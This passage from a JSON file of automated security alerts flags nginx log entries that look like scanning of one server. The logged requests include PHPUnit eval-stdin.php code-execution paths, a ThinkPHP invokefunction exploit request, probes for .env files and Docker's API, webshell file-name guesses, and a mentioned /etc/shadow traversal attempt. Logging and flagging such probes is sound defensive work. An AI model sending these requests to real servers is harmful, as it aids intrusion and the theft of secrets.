"original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/admin-footer.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /admin-footer.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:07:56.393625424Z" }, "3e77aafae132b73f268e0aeab36042b02de3a3aca7168066e12fe509d2e8d37a": { "type": "hash", "value": "3e77aafae132b73f268e0aeab36042b02de3a3aca7168066e12fe509d2e8d37a", "source": "auto", "reason": "HTTP request to obscure PHP file (asd.php) resulting in missing file; could indicate probing or vulnerability scanning.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/asd.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /asd.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:02:00.198429296Z" }, "401f0ed53cdf1947ff1e9cda3ffc43dae54e4ecd25dd3582ff8d5ad626f467f4": { "type": "hash", "value": "401f0ed53cdf1947ff1e9cda3ffc43dae54e4ecd25dd3582ff8d5ad626f467f4", "source": "auto", "reason": "Access attempt to /usr/share/nginx/default/tfm.php and open() failure suggests probe for a possible webshell/file of interest; not definitive but worth alerting.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/tfm.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET //tfm.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T13:59:15.898908015Z" }, "41cf71cca8a5c8336b9b67762625602c1195ad5bb3f918cd339538e412d28a2f": { "type": "hash", "value": "41cf71cca8a5c8336b9b67762625602c1195ad5bb3f918cd339538e412d28a2f", "source": "auto", "reason": "An error log showing an attempt to access a missing PHP file from a client, which can indicate probing or misconfiguration. Not clearly malicious but warrants monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/8.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /8.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:01:09.123369972Z" }, "4218443321fc90da18342f260db6cdd897b906bf1d917c48e891a6654d48f664": { "type": "hash", "value": "4218443321fc90da18342f260db6cdd897b906bf1d917c48e891a6654d48f664", "source": "auto", "reason": "An HTTP request resulted in a failed attempt to open a non-existent PHP file, which can indicate probing or misconfiguration. Not clearly malicious, but warrants attention.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ioxi-o.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ioxi-o.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:07:14.585337063Z" }, "430c6ec8dd15bc86fadac3b80fb0563d2974f0f371835a5e077b66e4234c547b": { "type": "hash", "value": "430c6ec8dd15bc86fadac3b80fb0563d2974f0f371835a5e077b66e4234c547b", "source": "auto", "reason": "Error indicates a request for a non-existent PHP file which could be probing for PHP files or misconfiguration leading to 404-like behavior; not clearly malicious but merits alerting.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/amax.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /amax.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:07:07.478470238Z" }, "433b19cb1b868e98eb24ede097e1529b79ed0223160f588ea6a0b77486d91890": { "type": "hash", "value": "433b19cb1b868e98eb24ede097e1529b79ed0223160f588ea6a0b77486d91890", "source": "auto", "reason": "External client attempted to access /containers/json on nginx, which is a common Docker API probe indicating potential Docker API exposure or reconnaissance.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/containers/json\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /containers/json HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:49:16.350326872Z" }, "45938bef517f1297a35f405764bff79ac4d4ec23b715a725b3c321afe1509202": { "type": "hash", "value": "45938bef517f1297a35f405764bff79ac4d4ec23b715a725b3c321afe1509202", "source": "auto", "reason": "HTTP 404-like open() failure for a PHP file suggests probing for vulnerable or misconfigured PHP files; could indicate an attacker attempting to access webroot files.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/a5e0a.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /a5e0a.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:08:35.310300077Z" }, "4612c6dd3e039f14e4a9bf9cfa13d55d5c60e5e9a10773dc8f33bd0862aaa432": { "type": "hash", "value": "4612c6dd3e039f14e4a9bf9cfa13d55d5c60e5e9a10773dc8f33bd0862aaa432", "source": "auto", "reason": "Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure", "original_line": "\"captain.admin.kovicloud.com\" \"\u003cVAR\u003e\" 200 83 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T15:16:08.354351766Z" }, "49dff014fd8e047bcd19a13beaa98501692d503e7e1666771bfefccadac647d0": { "type": "hash", "value": "49dff014fd8e047bcd19a13beaa98501692d503e7e1666771bfefccadac647d0", "source": "auto", "reason": "Open() failed due to missing file for a request to /sse; could indicate misconfiguration or missing resources but not definitive malicious activity.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/sse\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /sse HTTP/2.0\", host: \"54.200.221.0\"", "created_at": "2026-03-20T07:02:43.19629161Z" }, "4a38c8e92a28bd3845477b8ea79ae70d90a68ede84f7431c0bc4f8d59c288a0e": { "type": "hash", "value": "4a38c8e92a28bd3845477b8ea79ae70d90a68ede84f7431c0bc4f8d59c288a0e", "source": "auto", "reason": "Access attempt to a sensitive phpunit file suggests probing for remote code execution vulnerabilities.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:47:09.462389454Z" }, "4a3e68faa918f7bc6110e06d97cef86956ca78f27665ee8d1bb4c95783d5e09f": { "type": "hash", "value": "4a3e68faa918f7bc6110e06d97cef86956ca78f27665ee8d1bb4c95783d5e09f", "source": "auto", "reason": "Request targets admin/index.html and nginx cannot open the file; could indicate probing for admin assets or misconfiguration. Not definitive malicious but warrants monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/admin/index.html\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /admin/index.html HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-20T09:19:21.038359473Z" }, "4c928495ad51d343916b44f5a9dd8bfdb13598d8e212f9d76a7d63bc0d5e614e": { "type": "hash", "value": "4c928495ad51d343916b44f5a9dd8bfdb13598d8e212f9d76a7d63bc0d5e614e", "source": "auto", "reason": "An error open() for a suspicious PHP file (s.php) in nginx default path with a client probing pattern; indicates potential web probing or misconfiguration rather than a confirmed attack.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/s.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /s.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:05:57.077216178Z" }, "4c9431d29705ced894e56ede143291d303b4bd1c6c27090085442041d87e9b4a": { "type": "hash", "value": "4c9431d29705ced894e56ede143291d303b4bd1c6c27090085442041d87e9b4a", "source": "auto", "reason": "Evidence of an attempted exploit via a crafted request to index.php (thinkphp vulnerability pattern) leading to a file-not-found error. No evidence of success; still suspicious and warrants monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/public/index.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /public/index.php?s=/index/\\think\\app/invokefunction\u0026function=call_user_func_array\u0026vars[0]=md5\u0026vars[1][]=Hello HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:49:01.417977471Z" }, "4d547707112fabdb84b47080c2e3199ce8fbc87d94c097806bbcb7e6bad29d60": { "type": "hash", "value": "4d547707112fabdb84b47080c2e3199ce8fbc87d94c097806bbcb7e6bad29d60", "source": "auto", "reason": "Failed to open a likely targeted PHP file (varb.php) from a common web request, indicating possible probing or misconfigured file paths.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/varb.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /varb.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:04:41.66167811Z" }, "50b4ccd0826a64e6c4cbb7f632632678f055136bac475e9205752c2d9571dc54": { "type": "hash", "value": "50b4ccd0826a64e6c4cbb7f632632678f055136bac475e9205752c2d9571dc54", "source": "auto", "reason": "Access from an external IP with a CensysInspect user agent hitting the root path and issuing a redirect could indicate automated scanning or probing activity.", "original_line": "\"login.admin.kovicloud.com\" \"\u003cVAR\u003e\" 302 138 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T10:29:44.606880432Z" }, "519297f06edf42c112060f178618d5a631d503166fec6f936b4a8555193c3268": { "type": "hash", "value": "519297f06edf42c112060f178618d5a631d503166fec6f936b4a8555193c3268", "source": "auto", "reason": "Access to a phpunit path that is often targeted in automated scanning; file not found but indicates probing for PHPUnit related vectors.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:46:07.942698568Z" }, "526b3f1107a4a17c33fe9f5a856f81170acc51c85f7c1f54a6435a519e8a2dc6": { "type": "hash", "value": "526b3f1107a4a17c33fe9f5a856f81170acc51c85f7c1f54a6435a519e8a2dc6", "source": "auto", "reason": "Access attempt to PHP Unit vendor path (eval-stdin.php) commonly used in exploit scans against phpunit; unusual path request indicating potential probe for RCE.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/vendor/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:45:32.278356071Z" }, "53210338f40058fde0f4e417252865c5cf38b79eca401d38d5eec39f9ca81964": { "type": "hash", "value": "53210338f40058fde0f4e417252865c5cf38b79eca401d38d5eec39f9ca81964", "source": "auto", "reason": " nginx error showing missing file ws88.php when handling a GET request; could indicate probing for PHP files or misconfigured routes.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ws88.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ws88.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:02:34.254752954Z" }, "53f28d95bd02b193c7d118e372508906c0988842d84357a0a64d187235eaf7e3": { "type": "hash", "value": "53f28d95bd02b193c7d118e372508906c0988842d84357a0a64d187235eaf7e3", "source": "auto", "reason": "An HTTP request to a potentially sensitive PHP file (tool.php) resulted in a missing file error. Could indicate probing or misconfiguration; not definite maliciousness but warrants attention.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/tool.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /tool.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:01:36.729718671Z" }, "58b682119525fd718d49ad30a8cf07f8f31177ca3529db7e2621dd8cf154fdaa": { "type": "hash", "value": "58b682119525fd718d49ad30a8cf07f8f31177ca3529db7e2621dd8cf154fdaa", "source": "auto", "reason": "Request for a PHP file ws80.php under nginx default path; file missing but indicates probing or unexpected PHP asset access.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ws80.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ws80.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:02:06.449215484Z" }, "5ff138588f26dce06681be4a3caf4b7e5c143f97319b5f40d554dbd875a0e09d": { "type": "hash", "value": "5ff138588f26dce06681be4a3caf4b7e5c143f97319b5f40d554dbd875a0e09d", "source": "auto", "reason": "Access to /amp.php resulting in a file not found can indicate probing for vulnerable scripts; while not definitive, it warrants monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/amp.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /amp.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:03:07.90546032Z" }, "5ff316a334469290a4edf7136119d6de83b09170516e98cdb5d1606a48e3767f": { "type": "hash", "value": "5ff316a334469290a4edf7136119d6de83b09170516e98cdb5d1606a48e3767f", "source": "auto", "reason": "An error log showing a client requesting /1.php which does not exist; this can indicate probing or automated scanning activity.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/1.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /1.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:03:19.094727212Z" }, "6030f41f37742a7395e30af64ff511c7fde5492f3144897506cef23455dbc440": { "type": "hash", "value": "6030f41f37742a7395e30af64ff511c7fde5492f3144897506cef23455dbc440", "source": "auto", "reason": "Suspicious access to a random PHP file in nginx default directory with no such file; typical probe/scan behavior.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/6kDPjgFTmvS.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /6kDPjgFTmvS.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:09:52.952154868Z" }, "6181ecf8b98196c4d80fd5649868edcbfeecf607b9e4a8e7463e454f4b411576": { "type": "hash", "value": "6181ecf8b98196c4d80fd5649868edcbfeecf607b9e4a8e7463e454f4b411576", "source": "auto", "reason": "Log shows an HTTP 400 response with an empty/requestless line and placeholder values in the normalized form, indicating a potential anomalous access attempt.", "original_line": "\"_\" \"\u003cVAR\u003e\" 400 0 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T07:17:49.726192576Z" }, "635e77da1afc0b3e5ca9d14ffc5ca2033efae0e46ca11edb2b78855c603676f2": { "type": "hash", "value": "635e77da1afc0b3e5ca9d14ffc5ca2033efae0e46ca11edb2b78855c603676f2", "source": "auto", "reason": "HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners.", "original_line": "\"media.admin.kovicloud.com\" \"\u003cVAR\u003e\" 400 143 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T09:11:36.379876481Z" }, "63eca857b8c0c138715dd1b918c01497e833bc0f15fe04897102872da655071d": { "type": "hash", "value": "63eca857b8c0c138715dd1b918c01497e833bc0f15fe04897102872da655071d", "source": "auto", "reason": "Error log shows a request for a non-existent PHP file (xxw.php), suggesting probing or attempted access to VM/web server resources.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/xxw.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /xxw.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:04:06.01885337Z" }, "64a12c0085fc3b858e257abe377ed08c151f2317ad3b3bf73e1808f4773848e1": { "type": "hash", "value": "64a12c0085fc3b858e257abe377ed08c151f2317ad3b3bf73e1808f4773848e1", "source": "auto", "reason": "An error indicating a missing PHP file mh.php was requested, which can indicate probing for vulnerable PHP scripts. Not definitively malicious, but warrants alert.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/mh.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /mh.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:01:19.85363004Z" }, "64c126af6e6b79feda056ce8aa7a62711c00ed37cef0bc5a9a9b34bead57a053": { "type": "hash", "value": "64c126af6e6b79feda056ce8aa7a62711c00ed37cef0bc5a9a9b34bead57a053", "source": "auto", "reason": "Access to phpunit utility file under /panel/vendor/phpunit/phpunit is a common target for PHP unit testing tool probes; the error shows missing file but indicates an attempted access to a sensitive path.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:48:30.67174638Z" }, "6639a1e3ee7f023b91e5f2b43e686da59f417e6ffba881ae2c92aa9ecacadb09": { "type": "hash", "value": "6639a1e3ee7f023b91e5f2b43e686da59f417e6ffba881ae2c92aa9ecacadb09", "source": "auto", "reason": "Error opening a file under /usr/share/nginx/default when handling a request for /abc.php could indicate a missing file or an unexpected access attempt", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/abc.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /abc.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:07:46.04029059Z" }, "67b267722803e08148678d327dc037588897038c7f2b906144e6870e7e0edbca": { "type": "hash", "value": "67b267722803e08148678d327dc037588897038c7f2b906144e6870e7e0edbca", "source": "auto", "reason": "HTTP request for /okxh.php resulting in file not found; could be probing for hidden PHP resources or a webshell.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/okxh.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /okxh.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:06:20.433200845Z" }, "696950823ae5a28682cbedab6c83653d522ae79c7df44e5a077e7381a0338b22": { "type": "hash", "value": "696950823ae5a28682cbedab6c83653d522ae79c7df44e5a077e7381a0338b22", "source": "auto", "reason": "An error log indicating attempt to open a PHP file that does not exist (potential probing for PHP files). Not definitive malicious, but warrants monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/d12.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /d12.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:07:31.969463937Z" }, "6a1be5673d14df15318fe54117c7666679e53b5ae710167fc20c7c54eb4a3d16": { "type": "hash", "value": "6a1be5673d14df15318fe54117c7666679e53b5ae710167fc20c7c54eb4a3d16", "source": "auto", "reason": "An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/.env\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /.env HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-20T01:31:53.88780559Z" }, "6b1f4630bf309c3626c4d874abacbae680c3aa6809ae2fa07584ed09c0cdeaf0": { "type": "hash", "value": "6b1f4630bf309c3626c4d874abacbae680c3aa6809ae2fa07584ed09c0cdeaf0", "source": "auto", "reason": "Attempted access to phpunit tooling path (eval-stdin.php) which is a common probe for RCE in PHP environments; indicates a potential attempt to abuse known tooling.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:48:36.353115011Z" }, "6e3c1afb3ac5dd32811d5326ac76fff1edc64354cd6b0f6b3b5b6815db9c3f09": { "type": "hash", "value": "6e3c1afb3ac5dd32811d5326ac76fff1edc64354cd6b0f6b3b5b6815db9c3f09", "source": "auto", "reason": "Access to /manage/account/login resulted in a file not found error, which can indicate probing for admin/login paths or misconfigured routes.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/manage/account/login\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /manage/account/login HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-20T09:19:15.722310402Z" }, "6f04a421b711a9833d26f2a2cea2ec341bc59beb6067e141755398cf7779094f": { "type": "hash", "value": "6f04a421b711a9833d26f2a2cea2ec341bc59beb6067e141755398cf7779094f", "source": "auto", "reason": "TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt.", "original_line": "\"_\" \"\u003cVAR\u003e\" 400 150 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T01:34:57.069962355Z" }, "73cc37dbf5fa6ff94b7bf977cdea045fffdd50cd54e4e6d5cb8af5000cdb1988": { "type": "hash", "value": "73cc37dbf5fa6ff94b7bf977cdea045fffdd50cd54e4e6d5cb8af5000cdb1988", "source": "auto", "reason": "HTTP 404 for a wp-filemanager.php path in WordPress plugins is a common probe pattern targeting potential vulnerability vectors.", "original_line": "\"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\" \"\u003cVAR\u003e\" 404 2401 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T13:59:04.787848004Z" }, "74a1bd453cda5d89c2f3740768c274233af5a7ab6ec5a0b37567b56e5a627f21": { "type": "hash", "value": "74a1bd453cda5d89c2f3740768c274233af5a7ab6ec5a0b37567b56e5a627f21", "source": "auto", "reason": "An error log shows an attempt to access /nw.php which does not exist; could indicate probing for PHP file disclosure or misconfigured routing.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/nw.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /nw.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:05:51.864654699Z" }, "7582fd242d35f23b1bf1dfb67e01e4b51589a39b3bf35b47c9862ed9b0d8920a": { "type": "hash", "value": "7582fd242d35f23b1bf1dfb67e01e4b51589a39b3bf35b47c9862ed9b0d8920a", "source": "auto", "reason": "An error indicating a missing file /usr/share/nginx/default/abrand.php while handling a GET request. This can be normal if assets are missing, but it could also indicate probing for PHP files or misconfigured webroot.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/abrand.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /abrand.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:05:08.151728333Z" }, "76286bae99111d6e9c57eeb6c8080505c161b659bdcb265b43c82279691611d2": { "type": "hash", "value": "76286bae99111d6e9c57eeb6c8080505c161b659bdcb265b43c82279691611d2", "source": "auto", "reason": "Access to a phpunit path is a common probe vector for automated attacks; could indicate an attempted exploit targeting phpunit.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:47:21.461980413Z" }, "76a6054a7bfd3f25decbbdf93ddf4096e25584625e9bc78e856b4e0dcb7daeee": { "type": "hash", "value": "76a6054a7bfd3f25decbbdf93ddf4096e25584625e9bc78e856b4e0dcb7daeee", "source": "auto", "reason": "Request attempts to access a sensitive file (/etc/shadow) from an external IP; indicative of probing or path traversal attempt.", "original_line": "\"api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 404 6603 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-19T23:59:44.166746898Z" }, "7862159cee339c6203738ed24a06440211513a40cf07f780da1782e38670eab2": { "type": "hash", "value": "7862159cee339c6203738ed24a06440211513a40cf07f780da1782e38670eab2", "source": "auto", "reason": "Request to a wordpress-related PHP file that does not exist; could be probing for Wordpress/wpmu scripts or misconfigured files; unusual access pattern and missing file error", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp-png.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp-png.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:00:06.369214009Z" }, "7bda5e35cb18b1ad372c3d29bfd2c7da8329a0576b3eb69ab70b208a1780393b": { "type": "hash", "value": "7bda5e35cb18b1ad372c3d29bfd2c7da8329a0576b3eb69ab70b208a1780393b", "source": "auto", "reason": "Error indicating missing file install.php and a client from an external IP; could be probing for webshell or install script.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/install.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /install.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:09:10.789152695Z" }, "7c0bccb6f1a6ea48e042a4457a1f75fb73b6007fbf511e7fa75a3ce977ea1e61": { "type": "hash", "value": "7c0bccb6f1a6ea48e042a4457a1f75fb73b6007fbf511e7fa75a3ce977ea1e61", "source": "auto", "reason": "Access to a PHP file that does not exist may indicate probing for vulnerable endpoints or misconfigured site; common attack surface", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/000.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /000.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:00:13.287834159Z" }, "7d7de799780c5c574a1fc36c5fe83d3555c59c951c8d23c40824d25b969d3c85": { "type": "hash", "value": "7d7de799780c5c574a1fc36c5fe83d3555c59c951c8d23c40824d25b969d3c85", "source": "auto", "reason": "An access to a PHP file under the nginx default root (222.php) that does not exist could indicate a probe for PHP files or an attempted exploit targeting misconfigurations.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/222.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /222.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:01:24.83339865Z" }, "807bc88f0e219050bf93f1b2fc4bcef68ecc903e6623344033f59a74647e2a78": { "type": "hash", "value": "807bc88f0e219050bf93f1b2fc4bcef68ecc903e6623344033f59a74647e2a78", "source": "auto", "reason": "Access to /edit.php attempted and the file does not exist, which can indicate probing for sensitive PHP files.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/edit.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /edit.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:06:39.269872185Z" }, "81b193134db226a27bb81b5c2248eb78e708bbddc0c9421074be03d78efb7536": { "type": "hash", "value": "81b193134db226a27bb81b5c2248eb78e708bbddc0c9421074be03d78efb7536", "source": "auto", "reason": "NGINX error indicating a missing file being requested (w3lls.php) which may indicate an probe for common web shells or misconfiguration. Not definitive malicious activity but warrants attention.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() 